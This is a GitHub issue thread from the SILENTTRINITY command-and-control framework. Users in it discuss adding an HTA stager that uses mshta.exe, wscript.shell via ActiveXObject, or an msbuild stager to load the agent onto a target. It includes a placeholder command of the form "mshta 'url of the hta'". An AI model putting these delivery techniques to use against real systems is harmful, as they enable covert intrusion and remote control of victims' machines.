SILENTTRINITY icon indicating copy to clipboard operation
SILENTTRINITY copied to clipboard

Published 20 hours ago verified publisher icon byt3bl33d3r

HTA stager

Open RealHarshThakur opened this issue 5 years ago • 8 comments

Hey, Is it possible to add mshta based exploits? Generating html applications and running it with mshta shouldn't be a problem, I guess.

RealHarshThakur avatar Jan 06 '19 15:01 RealHarshThakur

What do you mean, like a payload that calls back to mshta.exe or a stagger that uses mshta.exe to get the agent on to the system?

RayofLightz avatar Jan 06 '19 22:01 RayofLightz

Stager to get the agent.

RealHarshThakur avatar Jan 08 '19 14:01 RealHarshThakur

So in one of the scripts you can use ActiveXObject to call cmd and call code. It is not the most clean solution but maybe you could grab and execute a msbuild stagger using a hta.

RayofLightz avatar Jan 09 '19 02:01 RayofLightz

Can you specify which script you're talking about?

RealHarshThakur avatar Jan 13 '19 05:01 RealHarshThakur

Using ActiveXObject , do you mean by creating wscript.shell object ? Won't that require the site to be in Trusted sites?

RealHarshThakur avatar Jan 13 '19 05:01 RealHarshThakur

You are talking about an hta correct. Htas are html applications. They live on local disk and are run inside of an stripped down IE window. The code that gets run is using ActiveXObject. The scripting languages can be either visualbasic or javascript. The issues is that ActiveXObject is limited to COM objects. Using wscript.shell is the only way I can think of being able to create a stagger. Even though it would basically fall back onto another staging method. Unless there is a COM object that can be used to compile c# ?

RayofLightz avatar Jan 14 '19 02:01 RayofLightz

I think this could be done: when the malicious executable runs, it could get the shell and run "mshta 'url of the hta'" .

RealHarshThakur avatar Jan 14 '19 23:01 RealHarshThakur

this is already on my to do list :)

byt3bl33d3r avatar Feb 09 '19 17:02 byt3bl33d3r